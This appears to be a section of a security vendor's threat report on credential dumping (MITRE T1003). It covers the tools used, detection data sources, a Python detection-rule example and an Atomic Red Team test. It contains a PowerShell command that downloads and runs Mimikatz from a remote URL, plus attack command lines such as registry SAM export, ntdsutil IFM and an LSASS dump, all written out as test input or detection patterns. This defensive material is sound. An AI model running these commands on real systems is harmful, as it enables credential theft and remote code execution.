TECHNIQUE T1003

Credential Dumping

While it wasn’t among our top 10 threats by volume, Credential Dumping affected a wide swath of our customers, due in no small part to the prominence of tools such as Mimikatz.

Overall rank: 11
Organizations affected: 32%
Confirmed threats: 762

Analysis

Credential Dumping accounted for a slightly larger percentage of total threats in 2019 but affected a slightly smaller percentage of customers.

Why do adversaries Dump Credentials?

Credential Dumping refers to a variety of methods that adversaries and professional penetration testers use to obtain legitimate usernames and passwords. Legitimate credentials offer adversaries one of the most effective and discreet means of accessing valuable data and systems. While there are methods of access that don’t require legitimate user credentials (vulnerability exploitation, for example), a working username and password are among the best tools for inconspicuously accessing a system of interest. For this reason, there is a vibrant market for stolen credentials on a wide variety of criminal forums.

Listed under the “Credential Access” tactic, Credential Dumping also enables initial access, lateral movement, and privilege escalation. The technique’s prevalence is largely the result of necessity. Adversaries effectively need credentials to accomplish their goals, and there is an abundance of very effective credential theft tools (e.g., Mimikatz, L0phtCrack, and gsecdump) that help accommodate this need.

Mimikatz is a major contributor to the prominence of Credential Dumping among threat detections in the environments we monitor.

How do adversaries Dump Credentials?

Some behaviors we commonly observe are:

  • PowerShell and other processes (e.g., Windows Task Manager and Sysinternals ProcDump) accessing and dumping memory from the Local Security Authority Subsystem Service (lsass.exe)
  • NTDSUtil dumping NTDS.dit (Active Directory)
  • Active Directory Explorer (AD Explorer) taking snapshots of Active Directory
  • Windows Registry Console Tool (reg.exe) exporting Windows Registry hives containing credentials
  • Windows Credential Editor dumping NT LAN Manager (NTLM) hashes

Emerging tactics

Some less common behaviors include:

  • Using Credential Dumping tools such as SafetyKatz and Cobalt Strike in memory
  • Leveraging Credential Dumping tools in non-executable files such as XSL stylesheets

Sighted with

We frequently observe this technique occurring in tandem with PowerShell (T1086), which is likely because the most common invocation method for Mimikatz relies on PowerShell.

Detection

MITRE’s data sources

  • API monitoring
  • Process monitoring
  • PowerShell logs
  • Process command-line parameters

Collection requirements

MITRE ATT&CK does not include file monitoring (e.g., password files written to disk) among the data sources that are useful for observing Credential Dumping. While it may be an indication of credential theft activity along with other data sources—such as process monitoring or process command-line parameters—file monitoring by itself is not a reliable data source for Credential Dumping activity.

Process monitoring

Process monitoring, however, is a data source that security teams should collect from if they want to observe Credential Dumping involving tools such as Mimikatz, Empire, L0phtCrack, and gsecdump. One quick and reliable way to observe and potentially detect credential harvesting is to monitor processes for known malicious binaries in combination with LSASS injection. Understanding the processes or programs in an environment that require access to LSASS will make this approach more effective.

Process command-line parameters

Monitoring process command-line parameters for known malicious CLI syntax may take some research and testing, but it is also a reliable way to observe and/or detect credential harvesting activity emanating from tools such as Mimikatz and Empire. For this data source to be used effectively, the command-line patterns you match on must be specific rather than overly general (a rule that filters on only one command option, for example, is too broad).

PowerShell logs

Enabling and monitoring PowerShell logs for known malicious syntax can help to detect Credential Dumping activity as well. This is particularly useful for observing things such as Invoke-Mimikatz and POWELIKS. At times when malicious binaries may not be observed via process monitoring, PowerShell logs may help detect activity reliant on PowerShell.

API monitoring

API monitoring is another good source to collect if you want to observe Credential Dumping. The key to API monitoring is knowing what and who should be directly connecting to the domain controller (DC). Knowing which IP addresses, applications, and user accounts typically make API calls to the DC will help reduce false positives and produce more reliable detections for Credential Dumping activity, particularly for tools such as DCSync, Mimikatz, and PowerSploit.

Detection suggestions

If you’re interested in generating reliable detection coverage for Credential Dumping activity, you’ll want to consider monitoring for the following behaviors:

  • Unknown or known malicious processes injecting into LSASS
  • DC connections from unusual IP addresses associated with non-standard or known compromised user accounts
  • reg.exe usage with the command line reg save hklm\sam
  • The binary mimikatz.exe or references to Mimikatz arguments in the CLI
  • Use of ntdsutil ifm

Weeding out false positives

Many of the techniques and tools used for administrative purposes can also be used for malicious Credential Dumping activity. As such, monitoring of processes without CLI and/or context can lead to a large number of false positives, particularly with processes such as adfind.exe, taskmgr.exe, ntdsutil.exe, reg.exe, vssadmin.exe, PowerShell, and adexplorer.exe.

Testing

Getting Started With Atomic Red Team

Start testing your defenses against Credential Dumping using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View Atomic tests for T1003: Credential Dumping. In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using PowerShell:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCr"

Useful telemetry will include:

Data source              Telemetry
Process monitoring       powershell.exe
Process command line     “DownloadString”, “WebClient”, and the presence of a URL
Network connection       powershell.exe establishing an external network connection
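As an added example (not code from the report or from Atomic Red Team), the detection suggestions listed above and the telemetry for the Atomic test are expressed as rules run over constructed process events; the sample events, the placeholder URL, and the allowlist of processes expected to open LSASS are assumptions to be replaced with your own baseline.

```python
import re

# Constructed sample process events (not real telemetry). "target" is set when
# the event records a handle opened on another process, as an EDR would log.
SAMPLE_EVENTS = [
    {"image": "reg.exe", "cmdline": "reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv"},
    {"image": "ntdsutil.exe", "cmdline": 'ntdsutil "ac i ntds" "ifm" "create full C:\\t" q q'},
    {"image": "powershell.exe", "cmdline": "powershell.exe \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/cradle'); Invoke-Mimikatz\""},
    {"image": "mimikatz.exe", "cmdline": "mimikatz.exe"},
    {"image": "procdump.exe", "cmdline": "procdump.exe -ma lsass.exe lsass.dmp", "target": "lsass.exe"},
    {"image": "MsMpEng.exe", "cmdline": "MsMpEng.exe", "target": "lsass.exe"},
    {"image": "reg.exe", "cmdline": "reg query hklm\\software\\example"},
]

# Assumed baseline of processes expected to open LSASS (here, an AV engine);
# build yours from the environment, as the report advises, to cut false positives.
LSASS_ALLOWLIST = {"msmpeng.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def classify(event):
    """Return the names of the report's detection rules that the event matches."""
    image = event["image"].lower()
    cmd = event.get("cmdline", "").lower()
    hits = []
    # Unknown process opening LSASS (injection or memory dumping).
    if event.get("target", "").lower() == "lsass.exe" and image not in LSASS_ALLOWLIST:
        hits.append("lsass_access_unknown_process")
    # reg.exe exporting the SAM hive: "reg save hklm\sam".
    if image == "reg.exe" and re.search(r"\bsave\b.*hklm\\sam\b", cmd):
        hits.append("reg_save_sam")
    # The mimikatz binary or Mimikatz references (e.g., Invoke-Mimikatz) on the CLI.
    if "mimikatz" in image or "mimikatz" in cmd:
        hits.append("mimikatz_reference")
    # ntdsutil IFM media creation, which copies NTDS.dit.
    if image == "ntdsutil.exe" and re.search(r"\bifm\b", cmd):
        hits.append("ntdsutil_ifm")
    # PowerShell download cradle: the telemetry listed for the Atomic test.
    if image == "powershell.exe" and "downloadstring" in cmd and "webclient" in cmd and URL_RE.search(cmd):
        hits.append("powershell_download_cradle")
    return hits

def triage(events):
    """Pair each alerting event's image with the rules it matched."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event["image"], hits))
    return results
```

Running triage(SAMPLE_EVENTS) alerts on the first five events and stays silent on the allowlisted AV engine and the harmless reg query, which is the context-based filtering the "Weeding out false positives" section calls for.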

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.

Ricky Espinoza
Detection Engineer
The detection strategies in this section were brought to you by Ricky Espinoza! Ricky has eight years of experience and multiple SANS certifications. Prior to joining Red Canary, Ricky worked at the University of Colorado running incident response procedures, network security, and vulnerability management.